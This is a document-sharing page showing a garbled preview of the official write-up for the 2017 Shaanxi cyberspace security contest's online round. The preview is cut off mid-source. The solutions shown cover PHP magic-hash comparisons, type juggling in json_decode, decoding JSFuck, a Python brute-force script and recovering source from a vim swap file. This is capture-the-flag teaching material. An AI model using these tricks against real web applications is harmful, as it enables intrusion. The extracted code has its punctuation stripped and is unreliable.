2017 年(第三届)陕西省网络空间安全技术大赛线上赛官方writeup.pdf

2017 年(第三届)陕西省网络空间安全技术大赛线上赛官方writeup.pdf

  1. 1、有哪些信誉好的足球投注网站(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。。
  2. 2、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载
  3. 3、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
查看更多
2017 年(第三届)陕西省网络空间安全技术大赛线上赛官方writeup

2017年(第三届)陕西省网络空间安全技术大赛 线上赛官方Writeup 主办单位:陕西省兵工学会 承办单位:西安工业大学 协办单位:西安胡门网络技术有限公司 WEB部分 签到题 50 题目链接:5:84/ 首先查看网页源代码,发现是白盒审计: md5(240610708)//0e462097431906509019562988736854. md5(QNKCDZO)//0e830400451993494058024219903391 可以看到,这两个字符串一个只包含数字,一个只包含字母,虽 然两个的哈希不一样,但是都是一个形式:0e 纯数字这种格式的字 符串在判断相等的时候会被认为是科学计数法的数字,先做字符串到 数字的转换。 转换后都成为了0的好多好多次方,都是0,相等。因此 md5(240610708) md5(QNKCDZO); 网络空间安全技术大赛 / 提交后,会出现一个超链接: 接着查看网页源代码: php的json_decode()函数会根据json数据中的数据类型来将其 转换为php中的相应类型的数据。网页中的表单可能限制了所有的 输入都是string,即使输入数字,传入的东西也是 {key:0} 这是一个字符串0,我们需要让他为数字类型,用burp拦截,把两 个双引号去掉,变成这样: {key:0} 网络空间安全技术大赛 / 得到flag。 抽抽奖 75 Jsfuck 还有aaencode 的编码,解码得到flag。 继续抽 100 脚本如下 import requests import re import hashlib proxies {http::8080} defmd5(str): m hashlib.md5() m.update(str) returnm.hexdigest() defencode(str): output foriinstr: charCode ord(i) 网络空间安全技术大赛 / if(128charCode): charCode+ 128 elif(127charCode): charCode- 128 charCode 255-charCode hexCode hex(charCode).replace(0x,) if(2len(hexCode)): hexCode 0+hexCode output+ hexCode returnoutput index_url 5:81/index.php; get_url 5:81/get.php; token_url 5:81/token.php; s requests.Session() r s.get(index_url) token re.findall(rvalue \(.*)\hidden, r.text)[0] foriinrange(1,300): id encode(md5(str(i))) r s.get(get_url+?token +token+id +id) #print r.text result re.findall(:\(.*)\,r.text)[0] print result.decode(unicode-escape) flag re.findall(flag{,result) if(flag): break token s.get(token_url).text.replace(\,) Wrong 125 本题存在.index.php.swp的备份文件,在kali下执行 vim -r “index.php.swp”,修复文件,得到源码。 ?php error_repor

文档评论(0)

yanpizhuang + 关注
实名认证
内容提供者

该用户很懒,什么也没介绍

1亿VIP精品文档

相关文档